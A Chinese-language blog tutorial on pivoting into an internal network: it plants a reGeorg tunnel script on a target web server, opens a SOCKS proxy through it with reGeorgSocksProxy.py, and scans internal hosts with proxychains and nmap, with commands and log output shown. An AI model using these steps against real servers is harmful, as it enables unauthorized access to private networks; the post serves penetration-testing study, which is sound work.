内网渗透 —— 通过代理访问内网

作者: 分类: Web,Security 时间: 2017-04-10 评论: 1条评论

0x00 场景及使用到的工具

  • 本机处于内网
  • 目标机器处于内网,只映射80端口到出口IP(外网IP)上。
  • 内网同网段下存在其他活跃主机。

使用到的工具:

0x01 准备

本机是MacOSLinux下差不多,Windows就是代理软件的选择上有差别。

因为很多场景是服务器对外的服务是Web,所以先git clone一下reGeorg,里面有包括PHPJSPASPASPX在内的tunnel,用于开启Socks反向代理。

然后安装一下Proxifier,至于如何选择,可以看一下这里Comparison_of_proxifiers

General.png

Platforms.png

Proxy protocols and methods.png

这里选择基于proxychains开发的proxychains-ngkali上自带有proxychains。至于Windows下的话ProxifierSocksCap64都可以,也可以参见上面wiki里的对比来选择。

MacOS直接用以下命令安装:

brew install proxychains-ng --universal

Linux下可以到Github上下载源码来编译安装,Windows下基本是图形化..不说了

0x02 实测

根据情况把tunnel丢到服务器上,假设此处http://www.iFurySt.com/tunnel.aspx

usage: reGeorgSocksProxy.py [-h] [-l] [-p] [-r] -u  [-v]

Socks server for reGeorg HTTP(s) tunneller

optional arguments:
  -h, --help           show this help message and exit
  -l , --listen-on     The default listening address
  -p , --listen-port   The default listening port
  -r , --read-buff     Local read buffer, max data to be sent per POST
  -u , --url           The url containing the tunnel script
  -v , --verbose       Verbose output[INFO|DEBUG]

开启Socks5反向代理:

$ python reGeorgSocksProxy.py -p 5234 -u http://www.iFurySt.com/tunnel.aspx

[INFO   ]  Log Level set to [INFO]
[INFO   ]  Starting socks server [127.0.0.1:5234], tunnel at [http://www.iFurySt.com/tunnel.aspx]
[INFO   ]  Checking if Georg is ready
[INFO   ]  Georg says, 'All seems fine'

此时反向代理已经建立了,可以针对想要挂代理的应用开代理了。

比如我要用Nmap扫描与目标服务器处于同个网段下的主机的端口,皆可如下:

proxychains4 nmap -Pn 192.168.160.30

这时大概情况会如下图所示:

nmap-proxy.png

假如内网里有22,3389或者Web服务,只需要在ssh,浏览器上挂上Socks5代理(127.0.0.1:上面设置的端口)。Windows下只需要选择合适的代理,或者用系统自带的,开启全局代理也可以。

0x03 小结

题外话:上次去玩铁三数据分析赛的时候就在数据包里分析到tunnel.php,当时还不太懂,只猜测是隧道代理,也因为不熟悉,抓下来的包都不好分析。回头可以再把铁三的数据包翻出来分析下玩玩。

内网渗透的思想就是把内网渗透变成外网渗透,其中少不了的就是代理和端口转发。还是实践出真知,以前经常停留理论层面,导致学了忘,忘了学,消磨精力和耐力,现在多出实战,不仅更有趣,还能学到很多东西XD

声明:文章基本原创,允许转载,但转载时必须以超链接的形式标明文章原始出处及作者信息。

仅有 1 条评论

  1. Burhan Uddin

    Thanks and i am very grateful to get a big advantages,here is a offer to take online video course and certification chance.A very well-developed post with step by step guidance on proxy network
    The way you explained each point with necessary details and maintained good balance between theory and practice is really commendable. please tell me How do I access the ISM Dhanbad intranet outside the campus using VPN or reverse proxy, provided I am a student of the college?

    Thanks again

    时间: 2017-08-16 at 07:25 回复

添加新评论